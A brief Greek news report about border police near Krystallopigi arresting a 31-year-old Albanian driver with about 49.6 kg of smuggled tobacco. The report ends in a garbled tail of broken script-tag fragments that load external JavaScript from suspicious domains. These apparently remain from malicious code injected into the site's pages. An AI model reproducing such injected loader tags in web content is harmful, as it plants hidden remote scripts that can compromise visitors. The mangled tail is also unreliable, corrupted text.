Αλβανοί λαθρέμποροι μετέφεραν 50 κιλά καπνό

Αλβανοί λαθρέμποροι μετέφεραν 50 κιλά καπνό

Τώρα, εκτός από χασίς, εισάγουν στην Ελλάδα και μεγάλες ποσότητες… καπνού από την πατρίδα τους οι Αλβανοί λαθρέμποροι! Όμως, η απόπειρά τους να περάσουν 50 κιλά καπνού από αφύλακτο σημείο της μεθορίου στην Κρυσταλλοπηγή, «σκόνταψε» στους αστυνομικούς του Τμήματος Συνοριακής Φύλαξης.

Οι κινήσεις δυο αγνώστων που άφησαν δύο ταξιδιωτικούς σάκους σε ένα απόμερο σημείο δίπλα στην εθνική οδό Κρυσταλλοπηγής- Καστοριάς, έγιναν αντιληπτές από τους αστυνομικούς. Δεν επενέβησαν, όμως, γιατί οι δράστες επέστρεψαν τρέχοντας στο αλβανικό έδαφος, καλυμμένοι από το σκοτάδι. Έτσι, οι συνοριοφύλακες προτίμησαν να ακολουθήσουν ένα Ι.Χ. αυτοκίνητο που ο οδηγός του παρέλαβε τους σάκους.

Σε μικρή απόσταση, οι αστυνομικοί εγκλώβισαν το αυτοκίνητο, ακινητοποίησαν τον 31χρονο Αλβανό οδηγό και έκαναν έρευνα στους σάκους, μέσα στους οποίους βρέθηκαν 94 συσκευασίες με προϊόντα καπνού βάρους 49 κιλών και 653 γραμμαρίων! Ο αλλοδαπός συνελήφθη και παραπέμφθηκε στην εισαγγελέα Πλημμελειοδικών Φλώρινας που του άσκησε δίωξη για λαθρεμπορία, ενώ οι αρχές της Αλβανίας που ενημερώθηκαν για τη μεταφορά αναζητούν τους συνεργούς του.___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >